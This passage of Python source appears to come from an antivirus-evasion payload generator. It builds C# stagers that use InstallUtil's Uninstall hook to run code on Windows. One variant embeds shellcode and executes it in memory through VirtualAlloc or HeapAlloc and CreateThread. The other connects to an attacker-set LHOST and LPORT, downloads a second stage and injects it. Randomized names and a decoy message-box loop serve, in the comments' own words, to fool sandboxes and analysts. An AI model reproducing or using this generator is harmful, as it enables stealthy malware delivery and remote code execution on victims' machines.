"\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n" payload_code += "\t\t}\n\t}\n\n" payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n" payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format( classNameTwo) payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format( savedStateName) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classNameThree, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern IntPtr VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] public static extern bool VirtualProtect(IntPtr %s, uint %s, uint %s, out uint %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, IntPtr %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11], r[12], r[13], r[14], r[15]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};" % ( shellcodeName, Shellcode) payload_code += '\t' * num_tabs_required + "IntPtr %s = VirtualAlloc(0, (UInt32)%s.Length, 0x3000, 0x04);\n" % ( funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( shellcodeName, funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += '\t' * num_tabs_required + "uint %s;\n" % ( random_out) payload_code += '\t' * num_tabs_required + "bool %s = VirtualProtect(%s, (uint)0x1000, (uint)0x20, out %s);\n" % ( rand_bool, funcAddrName, random_out) payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = bypass_helpers.randomString() rand_ptr = bypass_helpers.randomString() rand_var = bypass_helpers.randomString() payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};" % ( shellcodeName, Shellcode) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, shellcodeName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, shellcodeName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, shellcodeName, shellcodeName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);\n'.format( hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 self.payload_source_code = payload_code return
def generate(self): # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] # installutil random class variables getDataName = helpers.randomString() className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() classNameThree = bypass_helpers.randomString() execName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;\n" payload_code += "\tpublic class {0} {{\n".format(className) payload_code += "\t\tpublic static void Main()\n\t\t{\n" # lets add a message box to throw offf sandbox heuristics and analysts :) # there is no decryption routine, troll.level = 9000 # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter. payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n" payload_code += "\t\t}\n\t}\n\n" payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n" payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format( classNameTwo) payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format( savedStateName) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classNameThree, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) hostName = helpers.randomString() portName = helpers.randomString() ipName = helpers.randomString() sockName = helpers.randomString() length_rawName = helpers.randomString() lengthName = helpers.randomString() sName = helpers.randomString() total_bytesName = helpers.randomString() handleName = helpers.randomString() payload_code += "static byte[] %s(string %s, int %s) {\n" % ( getDataName, hostName, portName) payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % ( ipName, hostName, portName) payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % ( sockName) payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName) payload_code += " catch { return null;}\n" payload_code += " byte[] %s = new byte[4];\n" % (length_rawName) payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName) payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % ( lengthName, length_rawName) payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName) payload_code += " int %s = 0;\n" % (total_bytesName) payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName) payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % ( total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName) payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % ( handleName, sockName) payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % ( handleName, sName, sName) payload_code += " return %s;}\n" % (sName) # code fo the inject() function to inject shellcode injectName = bypass_helpers.randomString() sName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) sName = bypass_helpers.randomString() num_tabs_required = 0 payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % ( sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += " %s(%s);\n" % (injectName, sName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 self.payload_source_code = payload_code return